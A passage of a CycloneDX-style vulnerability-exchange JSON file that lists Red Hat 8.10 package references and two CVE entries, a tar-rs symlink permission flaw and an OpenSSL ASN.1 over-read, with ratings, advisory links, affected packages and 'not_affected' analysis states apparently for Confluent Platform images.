          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-33056",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        61
      ],
      "description": "tar-rs is a tar archive reading/writing library for Rust. In versions 0.4.44 and below, when unpacking a tar archive, the tar crate's unpack_dir function uses fs::metadata() to check whether a path that already exists is a directory. Because fs::metadata() follows symbolic links, a crafted tarball containing a symlink entry followed by a directory entry with the same name causes the crate to treat the symlink target as a valid existing directory \u2014 and subsequently apply chmod to it. This allows an attacker to modify the permissions of arbitrary directories outside the extraction root. This issue has been fixed in version 0.4.45.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-33056"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-33056"
        },
        {
          "url": "https://github.com/alexcrichton/tar-rs"
        },
        {
          "url": "https://github.com/alexcrichton/tar-rs/commit/17b1fd84e632071cb8eef9d3709bf347bd266446"
        },
        {
          "url": "https://github.com/alexcrichton/tar-rs/security/advisories/GHSA-j4xf-2g29-59ph"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33056"
        },
        {
          "url": "https://rustsec.org/advisories/RUSTSEC-2026-0067.html"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8138-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8139-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8168-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-33056"
        }
      ],
      "published": "2026-03-20T08:16:11+00:00",
      "updated": "2026-06-17T10:36:52+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2",
          "versions": [
            {
              "version": "2:1.30-11.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-34180",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        125
      ],
      "description": "Issue summary: Parsing a crafted DER-encoded ASN.1 structure with a primitive\nelement whose content exceeds 2 gigabytes in length may cause a heap buffer\nover-read on 64-bit Unix and Unix-like platforms.\n\nImpact summary: The heap buffer over-read may crash the application (Denial of\nService) or to load into the decoded ASN.1 object contents of memory beyond the\nend of the input buffer.  More typically such ASN.1 elements would instead be\ntruncated.\n\nAn integer truncation in OpenSSL's ASN.1 decoder causes the content length of\nan ASN.1 primitive element to be mishandled when it exceeds 2 gigabytes. In the\nworst case the truncated length is treated as a request to scan the binary\ncontent for a terminating zero byte, possibly causing OpenSSL to read either\nless than or beyond the end of the allocated buffer.\n\nApplications that pass attacker-supplied data to d2i_X509(), d2i_PKCS7(), or\nany other d2i_* decoding function are affected. OpenSSL's own command-line\ntools are not vulnerable, as data read through the BIO layer is checked before\nit reaches the affected code. The issue only affects 64-bit Unix and Unix-like\nplatforms; 32-bit platforms and 64-bit Windows are not affected.\n\nThe FIPS modules in 4.0, 3.6, 3.5, 3.4 and 3.0 are not affected by this issue,\nas the affected code is outside the OpenSSL FIPS module boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-34180"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25237"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25239"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-34180"
        },
        {
          "url": "https://bugzilla.redhat.com/2481879"
        },
        {
          "url": "https://bugzilla.redhat.com/2481880"
        },
        {
          "url": "https://bugzilla.redhat.com/2481881"
        },
        {
          "url": "https://bugzilla.redhat.com/2481882"
        },
        {
          "url": "https://bugzilla.redhat.com/2481884"
        },
        {
          "url": "https://bugzilla.redhat.com/2481885"
        },
        {
          "url": "https://bugzilla.redhat.com/2481887"
        },
        {
          "url": "https://bugzilla.redhat.com/2481890"
        },
        {
          "url": "https://bugzilla.redhat.com/2481891"
        },
        {
          "url": "https://bugzilla.redhat.com/2481892"
        },
        {
          "url": "https://bugzilla.redhat.com/2481893"
        },
        {
          "url": "https://bugzilla.redhat.com/2481894"
        },
        {
          "url": "https://bugzilla.redhat.com/2481896"
        },
        {
          "url": "https://bugzilla.redhat.com/2481897"
        },
        {
          "url": "https://bugzilla.redhat.com/2481898"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481879"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481880"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481881"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481882"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481884"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481885"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481887"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481890"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481892"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481893"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481894"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481896"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481897"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481898"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34180"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34181"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34182"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34183"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42764"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42766"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42767"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42768"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42769"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42770"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45445"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45446"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45447"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-7383"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9076"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-25237.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:25239"
        },
        {
          "url": "https://github.com/advisories/GHSA-3c8f-qq7h-7qv6"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/1c6908e4fa5fa568752221d8eaf561a809751e5d"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/cbe418ae978539cf14a398a207dba834c0e93e83"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/d93853c42110d6319e3df07842b488cb9f7ac5ff"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/da5d62af75f69d6fbf7803743d7c56ac75461e43"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/f696c73c3e61b8c502d040af62e690c060908a16"
        },
        {
          "url": "https://github.com/openssl/security/commit/1c6908e4fa5fa568752221d8eaf561a809751e5d"
        },
        {
          "url": "https://github.com/openssl/security/commit/cbe418ae978539cf14a398a207dba834c0e93e83"
        },
        {
          "url": "https://github.com/openssl/security/commit/d93853c42110d6319e3df07842b488cb9f7ac5ff"
        },
        {
          "url": "https://github.com/openssl/security/commit/da5d62af75f69d6fbf7803743d7c56ac75461e43"
        },
        {
          "url": "https://github.com/openssl/security/commit/f696c73c3e61b8c502d040af62e690c060908a16"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-34180.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50379.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34180"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260609.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8414-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8414-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-34180"
        }
      ],
      "published": "2026-06-09T17:17:04+00:00",
      "updated": "2026-07-23T08:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
